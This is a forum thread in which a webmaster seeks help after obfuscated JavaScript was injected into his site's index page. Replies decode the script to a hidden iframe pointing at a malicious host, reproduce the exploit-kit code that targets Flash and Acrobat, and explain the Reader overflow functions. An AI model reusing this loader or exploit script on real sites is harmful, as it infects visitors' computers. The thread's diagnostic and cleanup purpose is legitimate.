Someone hacked my website!

Discussion in 'Programming' started by [email protected], May 6, 2009.

  1. h@ck3r

    [email protected] New Member

    My forum is located here:

    /forum

    In the root of my domain, I only have an index.php file which is like a disclaimer, with only basic HTML (Enter / Don't enter).

    Problem is, the past few days members started reporting that their anti-virus etc. was saying my website is a malicious site, and warning of a virus.

    I use Nod32 and Avast on my PCs, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto-start ACROBATREADER.EXE.

    It would start using VERY HIGH memory resources, but seem to do nothing else.

    After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:

    PHP:
    <?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'?>
    Can anyone tell me how someone's done this, as I am the only person with FTP access to my website, other than my host?

    I've removed this code from the index.php file now and it seems to be fine, but I want to make sure this cannot happen again.

    I've also changed the index.php file for an index.html file.

    I'm also worried that they have uploaded something else on my server too, and not just added this coding. Is there any way to scan the server for a virus? Is this something my host would need to do?

    Can anyone give me any help with this as I need to make sure it doesn't happen again, and that I've totally got rid of it.

    Can't believe this has happened, after only posting in this thread a couple of days ago!

    Is there any way this code has been added to my index.php file because of this? That's when it all started, as soon as I added dock in rock (I've removed it now).

    Thanks for any help.
     
  2. vForums

    vForums New Member

    That's base25 code you're seeing, a way to disguise HTML. I've seen an exploit for vBulletin 3.7.5 and up; I'll try to post it here to get members aware. Seems they injected it into your header somehow, probably a shell contained in that code since it uses script codes..
     
  3. mmmxiv

    mmmxiv New Member

    I use that dock in rock and I don't have that code. Believe me, I checked.

    Though I did edit it a lot to my wishes.
     
  4. h@ck3r

    [email protected] New Member

    I cannot say 100% that it's down to Dock in Rock, but for sure somehow this script has been injected into that index.php file, and I need to find out how this has been done :)
     
  5. h@ck3r

    [email protected] New Member

    {<--7%\<-Boiiiiiing->/%7-->}
     
  6. Ab.Nath

    Ab.Nath New Member

  7. nagger

    nagger New Member

    I looked into this a little bit.

    That javascript blabla comes out to:

    Code:
    <iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
    It opens an iframe to that dodgy site which then runs the script that contains 2 infected exploits, one being a .swf file and one being a .pdf.

    Code:
    <script>
    // builds the string "iframe" piecewise so the tag name never appears literally
    function mjnhyua() { return 'ra'+'m'; }
    // loop 1: look for a Shockwave Flash plugin and pull its version numbers
    for(i=0;navigator.plugins[i];i++){
        regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
        var ertdfg = "dfgdfgdfgdf43565gkui"; // junk assignment, obfuscation only
        result=regexp.exec(navigator.plugins[i]['description']);
        ertdfg = "dfgdfgdfgdf43565gkui";
        // only Flash 9.0.x with x < 124 is served the .swf
        if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
            ertdfg = "dfgdfgdfgdf43565gkui";
            document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
            ertdfg = "dfgdfgdfgdf43565gkui";
            break;
        }
    }
    // loop 2: any browser with an Adobe Acrobat plugin is served the .pdf
    for(i=0;navigator.plugins[i];i++){
        name=navigator.plugins[i].name;
        if(name.indexOf('Adobe Acrobat')!=-1){
            document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
            break;
        }
    }
    </script>
    
    File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125

    Specifically crafted SWF (Flash) files allow remote file execution when the client has a vulnerable Flash Player. A malformed SWF record's value triggers a buffer overflow. The size of the SWF files varies. Usually it's a download-and-execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of Flash Player up to 9.0.124.0 are vulnerable (though we saw malicious pages trying to exploit only versions 115 and 47).

    The other file, the PDF: this is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's JavaScript engine in order to execute malicious code on the user's computer. The exploitation mainly involves the following two functions:

    util.printf() - if an attacker sends a string long enough to generate a stack-based buffer overflow, he will then be able to execute arbitrary code on the user's computer with the same privilege level as the user who opened the PDF file.

    Collab.collectEmailInfo() - a stack-based buffer overflow can be caused by passing a string long enough (at least 44952 characters) as a parameter in the msg field of this function.

    The JavaScript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
    The JavaScript code inside the PDF file is used to download and execute other malware on the user's computer.

    I can conclude that the following people are vulnerable to this exploit:
    people using Flash Player 9.0.124.0 and below, or Adobe Acrobat Reader before 8.1.2
     
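    As an added illustration, not code from the thread or from any poster: a small Node.js helper that decodes the separator-plus-char-code obfuscation nagger worked through above and scans page source for that pattern, so a cleanup pass can list what each injected script would document.write() without loading the page in a browser. It generalises to any separator and variable names; the regex and the short constructed sample (which decodes to a benign <iframe src="x">) are assumptions.

```javascript
// Added example, not code from the thread: decodes the separator-plus-char-code
// obfuscation nagger decoded above and scans page source for that pattern, so a
// cleanup pass can list what each injected <script> would document.write().
// Shape assumed: var A = "SEP60SEP105...";var B = A.split("SEP"); ...fromCharCode(B[i])

// Decode one payload; empty tokens are dropped (the sample starts with the
// separator, which is why the injected loop starts at index 1).
function decodeCharCodePayload(payload, separator) {
  return payload
    .split(separator)
    .filter((tok) => tok.length > 0)
    .map((tok) => {
      const code = Number(tok);
      if (!Number.isInteger(code) || code < 0 || code > 0xffff) {
        throw new Error(`token "${tok}" is not a char code`);
      }
      return String.fromCharCode(code);
    })
    .join("");
}

// Find every `var X = "...";var Y = X.split("SEP")` (any names, any separator)
// and decode it. Each hit reports the recovered markup and whether it is an
// <iframe>, the usual carrier for an off-site exploit page.
function findEncodedPayloads(source) {
  const re = /var\s+(\w+)\s*=\s*"([^"]*)"\s*;\s*var\s+\w+\s*=\s*\1\.split\("([^"]+)"\)/g;
  const hits = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    const [, variable, payload, separator] = m;
    let decoded;
    try {
      decoded = decodeCharCodePayload(payload, separator);
    } catch (e) {
      continue; // split() on something other than char codes: not this scheme
    }
    hits.push({ variable, separator, decoded, hiddenIframe: /<iframe\b/i.test(decoded) });
  }
  return hits;
}

// Constructed sample in the shape of the injected index.php line, with a short
// benign payload that decodes to <iframe src="x"></iframe>.
const SAMPLE_SOURCE =
  '<?php echo \'<script type="text/javascript">var jfbq = "' +
  'uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN115uxN114uxN99uxN61uxN34uxN120uxN34uxN62' +
  'uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCt = jfbq.split("uxN");' +
  'var out = "";for (var i=1; i<pCt.length; i++){out+=String.fromCharCode(pCt[i]);}' +
  'document.write(out)</script>\'?>';
```

    Run findEncodedPayloads() over the contents of each PHP/HTML file in the web root; any hit whose decoded markup is an off-site iframe is the injected line to remove.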
  8. h@ck3r

    [email protected] New Member

    Thanks for the above- Appreciated.

    But after doing a boot scan with Avast (Nod32 never found anything), I deleted a LOT of stuff from my PC, and I thought it had gone.

    But today the same error appeared again on my website. The code had somehow been injected to my index.html page.

    :(
     
  9. monoxera

    monoxera New Member

    I think you should try export / backup db, delete your FTP, install vb again, import using IMPEX.

    Really, that's what I would do. Sorry if I didn't help. Just wanted to give my opinion :)
     
  10. h@ck3r

    [email protected] New Member

    Cheers bud but my VB is not hacked.

    VB is in the /forum directory.

    The file that has been hacked twice now is my own custom made index.html / index.php file that's in the root of my domain.

    I've now removed this file, and setup a redirect in my .htaccess file.

    Fingers crossed the /forum/index.php file doesn't get injected with this script now though.

    Although I'm still trying to find out how I've been hacked in the first place.
     
  11. vForums

    vForums New Member

    Seems like <script> code executed from an XSS vuln in your site. Maybe /admincp/redirect=<script> etc etc
     
  12. h@ck3r

    [email protected] New Member

    Sorry to sound dumb but could you explain that in simple terms (If poss) to me? :D

    Are you saying that something I've installed (xss file) could be injecting this code?
     
  13. bouncer

    bouncer New Member

    Is there a solution? Sorry to be obtuse.
     
  14. KrazyFire

    KrazyFire New Member

    If you have cPanel do an antivirus check -.-
     
  15. h@ck3r

    [email protected] New Member

    I've got CPanelX- Is that what you mean?

    I don't see any antivirus checker in there though.. should there be? :/

    EDIT: This is the cpanel I have-

    Can't see any virus checker though.
     
  16. h@ck3r

    [email protected] New Member

    Progress... I'm pretty sure this: New Mebroot rootkit infects thousands of websites

    Is the infection we have.

    I just downloaded Prevx, but it wants £20 to remove the infections from my PC LOL.

    I'd rather back everything up and format my C drive :D
     
  17. dannyheath

    dannyheath New Member

    I had something like what you did and I told my host to reset my host and it seems to be working now.
     